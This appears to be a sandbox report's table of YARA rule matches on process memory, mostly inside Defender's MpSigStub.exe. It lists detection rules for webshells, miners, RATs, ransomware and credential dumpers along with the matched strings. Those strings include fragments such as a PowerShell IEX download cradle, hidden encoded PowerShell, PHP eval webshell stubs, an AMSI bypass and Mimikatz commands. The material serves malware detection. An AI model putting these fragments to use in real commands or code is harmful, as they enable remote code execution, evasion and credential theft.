00000024.00000003.6287839327.00000197A4D21000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x11dd1:$asp_much_sus8: Webshell 0x3129:$asp_much_sus15: antivirus 0x313f:$asp_much_sus15: antivirus 0x3261:$asp_much_sus15: Antivirus 0x333d:$asp_much_sus15: antivirus 0x3370:$asp_much_sus15: antivirus 0x338e:$asp_much_sus15: antivirus 0x33a6:$asp_much_sus15: antivirus 0x33d1:$asp_much_sus15: antivirus 0x3428:$asp_much_sus15: antivirus 0x343e:$asp_much_sus15: antivirus 0x3769:$asp_much_sus15: antivirus 0x3854:$asp_much_sus15: antivirus 0x386d:$asp_much_sus15: antivirus 0x3886:$asp_much_sus15: antivirus 0x3976:$asp_much_sus15: Antivirus 0x10b9e:$asp_much_sus28: exploit 0xf376:$asp_gen_obf1: "+" 0xf37c:$asp_gen_obf1: "+" 0x10183:$asp_gen_obf1: "+" 0x10a44:$asp_gen_obf1: "+"
00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x319d9:$payload4: eval(gzuncompress(base64_decode 0x16a1a:$php_short: <? 0x16a83:$php_short: <? 0x16aec:$php_short: <? 0x16b55:$php_short: <? 0x16bbe:$php_short: <? 0x1b093:$php_short: <? 0x1fd39:$php_short: <? 0x3fb28:$php_short: <? 0x16a1a:$php_new2: <?php 0x16a83:$php_new2: <?php 0x16aec:$php_new2: <?php 0x16b55:$php_new2: <?php 0x16bbe:$php_new2: <?php
00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x22e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x22ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x235bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x235ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x235fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x23b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x23b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x7bd8:$s1: stratum+tcp://
00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x2dc2c:$x1: /////////////////////regkeyenum////////////
00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x102e5:$s1: stratum+tcp://
00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp	HackTool_Samples	Hacktool	unknown	0x31ba2:$c: Failed to load SAM functions
00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp	PS_AMSI_Bypass	Detects PowerShell AMSI Bypass	Florian Roth	0x1c178:$s1: .getfield('amsicontext',[reflection.bindingflags]'nonpublic,static').
00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x3518b:$x1: reflectively inject a dll into a process. 0x35171:$x4: reflective_inject_dll 0x35228:$x4: reflective_inject_dll 0x35171:$x8: reflective_inject_dll 0x35228:$x8: reflective_inject_dll 0x35228:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x217f1:$s1: stratum+tcp://
00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x329d9:$payload4: eval(gzuncompress(base64_decode 0x17a1a:$php_short: <? 0x17a83:$php_short: <? 0x17aec:$php_short: <? 0x17b55:$php_short: <? 0x17bbe:$php_short: <? 0x1c093:$php_short: <? 0x20d39:$php_short: <? 0x40b28:$php_short: <? 0x17a1a:$php_new2: <?php 0x17a83:$php_new2: <?php 0x17aec:$php_new2: <?php 0x17b55:$php_new2: <?php 0x17bbe:$php_new2: <?php
00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x23e97:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x23ea7:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245bd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x245ed:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x245fd:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x24b67:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x24b77:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x28ead:$x4: reflective_inject_dll 0x28ead:$x8: reflective_inject_dll 0x28ead:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x2cbb:$s1: stratum+tcp://
00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6294115539.00000197A3970000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x3c932:$x1: IEX ((new-object net.webclient).download
00000024.00000003.6432826435.00000197A3C46000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3a1e:$s1: stratum+tcp://
00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x925f:$s1: stratum+tcp://
00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x3b8ac:$: odhyrfjcnfkdtslt
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0xd67e:$payload7: eval(base64_decode( 0xd669:$php_short: <? 0xe4dd:$php_short: <? 0x26827:$php_short: <? 0xd669:$php_new2: <?php 0xe4dd:$php_new2: <?php
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xd734:$s1: stratum+tcp://
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x333a3:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x33bae:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x33bbe:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1737:$s1: stratum+tcp://
00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000024.00000003.6288930033.00000197A47A0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3b7f3:$s1: stratum+tcp://
00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x23c95:$new_php2: <?php 0x77af:$dynamic3: $U\xBF(' 0x2243e:$gen_bit_sus11: "cmd.exe 0x23085:$gen_bit_sus11: "cmd.exe 0x242d8:$gen_bit_sus12: %comspec% 0x23ca0:$gen_bit_sus46: shell_ 0x2a319:$gen_bit_sus47: Shell 0x2baa9:$gen_bit_sus47: Shell 0x5eab:$gen_bit_sus62: Cyber 0x5ed6:$gen_bit_sus62: Cyber 0x23c7b:$gen_much_sus8: WebShell 0x26a18:$gen_much_sus15: AntiVirus 0x2713c:$gen_much_sus15: AntiVirus 0x27f65:$gen_much_sus15: antivirus 0x28042:$gen_much_sus15: antivirus 0x28056:$gen_much_sus15: antivirus 0x2d83f:$gen_much_sus15: Antivirus 0x23c57:$gen_much_sus18: "unsafe 0x24600:$gen_much_sus24: exploit 0x227f0:$gen_much_sus25: Exploit 0x22ab1:$gen_much_sus25: Exploit
00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x23c3e:$payload_and_input1: eval(request. 0x23c3c:$tagasp_short1: <%e 0x23c61:$tagasp_short2: %> 0x23c3c:$tagasp_long13: <%ev 0x2a243:$jsp4: public 0x2a2a1:$jsp4: public
00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000024.00000003.6352553916.00000197A34AB000.00000004.00000001.sdmp	webshell_asp_generic_eval_on_input	Generic ASP webshell which uses any eval/exec function directly on user input	Arnim Rupp	0x5bd1:$payload_and_input1: eval(request[ 0x4d11:$payload_and_input2: execute(request( 0x2f97:$tagasp_short1: <%\xC2 0x30cb5:$tagasp_short1: <%: 0x256a:$tagasp_short2: %> 0x24914:$tagasp_short2: %> 0x2e160:$tagasp_short2: %> 0x36c0:$tagasp_long20: <scripttype="text/vbscript"language="vb 0x66f2:$jsp4: public 0x340f1:$jsp4: public 0x3410a:$jsp4: public
Process Memory Space: MpSigStub.exe PID: 5556	hacktool_macos_keylogger_logkext	LogKext is an open source keylogger for Mac OS X, a product of FSB software.	@mimeframe	0x7f0e29:$a1: logKextPassKey 0x8190dc:$a2: Couldn't get system keychain: 0x7a284f:$a4: com_fsb_iokit_logKext 0xb03bea:$b1: logKext Password: 0xb03bfc:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0xb03c48:$b2: Logging controls whether the daemon is logging keystrokes (default is on). 0x7f0e29:$c1: logKextPassKey
Process Memory Space: MpSigStub.exe PID: 5556	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x2e35e4:$s1: powershell.exe -nop -w hidden -e 0x612c8e:$s1: powershell.exe -nop -w hidden -e 0xac74f1:$s1: powershell.exe -nop -w hidden -e 0xac752f:$s1: powershell.exe -nop -w hidden -e 0x6cdb9:$s2: Call Shell( 0x86ce5:$s2: Call Shell( 0xac85ba:$s2: Call Shell( 0xac85e4:$s2: Call Shell( 0x31d0da:$s3: Sub Workbook_Open() 0xad042f:$s3: Sub Workbook_Open()
Process Memory Space: MpSigStub.exe PID: 5556	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x214433:$xs1: WS2_32.dll 0x409ef5:$xs2: ReflectiveLoader 0x409f16:$xs2: ReflectiveLoader 0x6a65db:$xs2: ReflectiveLoader 0x854062:$xs2: ReflectiveLoader 0xb3d9ee:$xs2: ReflectiveLoader 0xb3da0e:$xs2: ReflectiveLoader 0xb3da42:$xs2: ReflectiveLoader
Process Memory Space: MpSigStub.exe PID: 5556	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x544449:$substring: AAAAYInlM 0x544445:$pattern1: /OiCAAAAYInlM
Process Memory Space: MpSigStub.exe PID: 5556	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0xb2cae5:$r1: p^o^w^e^r^s^h^E^L^L 0x8af3bc:$r2: p^owershell 0xb2cae5:$r2: p^o^w^e^r^s^h^E^L^L 0xb802c7:$r2: p^ower^shell 0xb802fb:$r2: p^ower^shell
Process Memory Space: MpSigStub.exe PID: 5556	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0x4becd:$a: Cookies: Sym1.0 0x4bf5b:$b: \\.\pipe\1[12345678]
Process Memory Space: MpSigStub.exe PID: 5556	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0x182f24:$x3: lsadump::dcsync
Process Memory Space: MpSigStub.exe PID: 5556	Keylogger_CN_APT	Keylogger - generic rule for a Chinese variant	Florian Roth	0xb31e4f:$s3: shutdown.exe -r -t 0 0x3a087b:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x3a08f6:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x54b8da:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x54b958:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x857e6b:$s5: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 0x8ffd7e:$s7: User Agent\Post Platform\ 0x8ffdee:$s7: User Agent\Post Platform\
Process Memory Space: MpSigStub.exe PID: 5556	Suspicious_PowerShell_WebDownload_1	Detects suspicious PowerShell code that downloads from web sites	Florian Roth	0x192a34:$s2: system.net.webclient).downloadstring('http 0x192a98:$s2: system.net.webclient).downloadstring('http
Process Memory Space: MpSigStub.exe PID: 5556	REDLEAVES_CoreImplant_UniqueStrings	Strings identifying the core REDLEAVES RAT in its deobfuscated state	USG	0x852096:$unique4: red_autumnal_leaves_dllmain.dll 0x851fa4:$unique7: \NamePipe_MoreWindows
Process Memory Space: MpSigStub.exe PID: 5556	PLUGX_RedLeaves	Detects specific RedLeaves and PlugX binaries	US-CERT Code Analysis Team	0x851fba:$s9: RedLeavesCMDSimulatorMutex
Process Memory Space: MpSigStub.exe PID: 5556	DeepPanda_htran_exe	Hack Deep Panda - htran-exe	Florian Roth	0x96a0ff:$s15: [+] OK! I Closed The Two Socket.
Process Memory Space: MpSigStub.exe PID: 5556	WindowsCredentialEditor	Windows Credential Editor	unknown	0x14e54d:$a: extract the TGT session key 0x839310:$b: Windows Credentials Editor
Process Memory Space: MpSigStub.exe PID: 5556	Amplia_Security_Tool	Amplia Security Tool	unknown	0x14e487:$a: Amplia Security 0x14e54d:$e: extract the TGT session key
Process Memory Space: MpSigStub.exe PID: 5556	HackTool_Samples	Hacktool	unknown	0x83d9a1:$i: WPE-C1467211-7C89-49c5-801A-1D048E4014C4
Process Memory Space: MpSigStub.exe PID: 5556	Ammyy_Admin_AA_v3	Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe	Florian Roth	0xa4d41e:$x1: S:\Ammyy\sources\target\TrService.cpp 0xa4d444:$x2: S:\Ammyy\sources\target\TrDesktopCopyRect.cpp 0xa4d472:$x3: Global\Ammyy.Target.IncomePort 0xa4d491:$x4: S:\Ammyy\sources\target\TrFmFileSys.cpp 0xa4d4b9:$x5: Please enter password for accessing remote computer 0xa4d35e:$s1: CreateProcess1()#3 %d error=%d 0xa4d37f:$s2: CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name. 0xa4d3c1:$s3: ERROR: CreateProcessAsUser() error=%d, session=%d 0xa4d3f5:$s4: ERROR: FindProcessByName('explorer.exe')
Process Memory Space: MpSigStub.exe PID: 5556	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0xf3d20:$: \\.\pipe\%s%s%d
Process Memory Space: MpSigStub.exe PID: 5556	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0xac8c36:$s1: "c" & "r" & "i" & "p" & "t" 0xad36ec:$s1: "c" & "r" & "i" & "p" & "t"
Process Memory Space: MpSigStub.exe PID: 5556	SUSP_PowerShell_IEX_Download_Combo	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x8ae1c9:$x1: iex ((new-object net.webclient).Download 0xb8ba73:$x1: IEX ((new-object net.webclient).download
Process Memory Space: MpSigStub.exe PID: 5556	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x7eea69:$: odhyrfjcnfkdtslt 0x7eea7a:$: odhyrfjcnfkdtslt
Process Memory Space: MpSigStub.exe PID: 5556	Cobaltbaltstrike_Payload_Encoded	Detects CobaltStrike payloads	Avast Threat Intel Team	0x67b781:$s05: fce8890000006089e531d2648b52308b
Process Memory Space: MpSigStub.exe PID: 5556	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0xb3d90a:$x4: reflective_inject_dll 0xb3d948:$x4: reflective_inject_dll 0xb3d90a:$x8: reflective_inject_dll 0xb3d948:$x8: reflective_inject_dll 0xb3d90a:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
Process Memory Space: MpSigStub.exe PID: 5556	IronPanda_Malware_Htran	Iron Panda Malware Htran	Florian Roth	0x126bb7:$s6: [+] Make a Connection to %s:%d.... 0x126b4b:$s9: [+] Make a Connection to %s:%d ...... 0x96a0ff:$s12: [+] OK! I Closed The Two Socket. 0x126b30:$s13: [-] TransmitPort invalid. 0x126ace:$s14: [+] Waiting for Client on port:%d ......
Process Memory Space: MpSigStub.exe PID: 5556	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x1429:$n1: file:// 0x4c65a:$n1: file:// 0xf2d0f:$n1: file:// 0x17800b:$n1: file:// 0x178028:$n1: file:// 0x178045:$n1: file:// 0x17806c:$n1: file:// 0x17840c:$n1: file:// 0x20cde5:$n1: file:// 0x26e96a:$n1: file:// 0x26e99b:$n1: file:// 0x2e03c4:$n1: file:// 0x2e03e6:$n1: file:// 0x30482b:$n1: file:// 0x30485e:$n1: file:// 0x3048f9:$n1: file:// 0x304917:$n1: file:// 0x31073e:$n1: file:// 0x31079e:$n1: file:// 0x41915c:$n1: file:// 0x4dbced:$n1: file://
Process Memory Space: MpSigStub.exe PID: 5556	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x20e3d6:$s1: sekurlsa::msv 0x20e3c4:$s2: sekurlsa::wdigest 0x32b395:$s2: sekurlsa::wdigest 0x20e3b0:$s4: sekurlsa::kerberos 0x32b382:$s4: sekurlsa::kerberos 0x182f54:$s5: sekurlsa::tspkg 0x20e363:$s6: sekurlsa::livessp 0x32b345:$s6: sekurlsa::livessp 0x20e354:$s7: sekurlsa::ssp 0x20e342:$s9: sekurlsa::process 0x32b333:$s9: sekurlsa::process 0x20e388:$s11: sekurlsa::pth 0x20e376:$s12: sekurlsa::tickets 0x32b357:$s12: sekurlsa::tickets 0x182f44:$s13: sekurlsa::ekeys 0x182f34:$s14: sekurlsa::dpapi 0x20e304:$s15: sekurlsa::credman 0x32b2f8:$s15: sekurlsa::credman
Process Memory Space: MpSigStub.exe PID: 5556	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x99411b:$a1: SharPersist.lib 0x99412b:$a2: SharPersist.exe 0x99413b:$b1: ERROR: Invalid hotkey location option given. 0x994168:$b2: ERROR: Invalid hotkey given. 0x994185:$b3: ERROR: Keepass configuration file not found. 0x9941b2:$b4: ERROR: Keepass configuration file was not found. 0x9941e3:$b5: ERROR: That value already exists in: 0x994208:$b6: ERROR: Failed to delete hidden registry key. 0x994235:$pdb1: \SharPersist\ 0x994243:$pdb2: \SharPersist.pdb 0x994254:$pdb2: \SharPersist.pdb
Process Memory Space: MpSigStub.exe PID: 5556	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x5bc2d1:$pdb1: \ADPassHunt\ 0x5bc2de:$pdb2: \ADPassHunt.pdb 0x5bc2ee:$s1: Usage: .\ADPassHunt.exe 0x5bc306:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x5bc342:$s3: [ADA] Searching for accounts with userpassword attribute 0x5bc37b:$s4: [GPP] Searching for passwords now 0x5bc39d:$s4: [GPP] Searching for passwords now
Process Memory Space: MpSigStub.exe PID: 5556	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x904963:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x904848:$rat2: rat.(Core).generateBeacon 0x904863:$rat3: rat.gJitter 0x904870:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x9048d4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x90493a:$rat8: rat/modules/netsweeper.(Pinger).listen 0x904963:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x904990:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x904821:$winblows: rat/platforms/win.(winblows).GetStage
Process Memory Space: MpSigStub.exe PID: 5556	ChinaChopper_Generic	China Chopper Webshells - PHP and ASPX	Florian Roth	0xb8f025:$php: php @eval($_POST[
Process Memory Space: MpSigStub.exe PID: 5556	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x798812:$one6: Shell Environ$("COMSPEC") & " /c 0xa5987d:$one6: Shell Environ$("COMSPEC") & " /c 0xa59ce1:$one6: Shell Environ$("COMSPEC") & " /c 0xa59d02:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0xa59c99:$two5: NullRefrencedException 0xa59cb1:$two6: error has occurred in user32.dll by 0xa59c99:$two7: NullRefrencedException
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_blackmoon	Yara detected BlackMoon Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Allatori_JAR_Obfuscator	Yara detected Allatori_JAR_Obfuscator	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Valak_1	Yara detected Valak	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_RevengeRAT	Yara detected RevengeRAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_AESCRYPTRansomware	Yara detected AESCRYPT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_VB_Keylogger_Generic	Yara detected VB_Keylogger_Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Ragnarok_ransomware	Yara detected Ragnarok ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Axiom	Yara detected Axiom Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_rhino	Yara detected Rhino ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_DarkSide	Yara detected DarkSide Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Dorkbot	Yara detected Dorkbot	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Clay	Yara detected Clay Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_OCT_RANSOMWARE	Yara detected OCT Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_AutohotkeyDownloaderGeneric	Yara detected Autohotkey Downloader Generic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Pony	Yara detected Pony	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_LokiLocker	Yara detected LokiLocker Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Ouroboros_ransomware	Yara detected Ouroboros ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_jcrypt	Yara detected Jcrypt Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_LaZagne	Yara detected LaZagne password dumper	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_Koadic	Yara detected Koadic	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MpSigStub.exe PID: 5556	JoeSecurity_EvilGnomeRC5Key	Yara detected Linux EvilGnome RC5 key	unknown
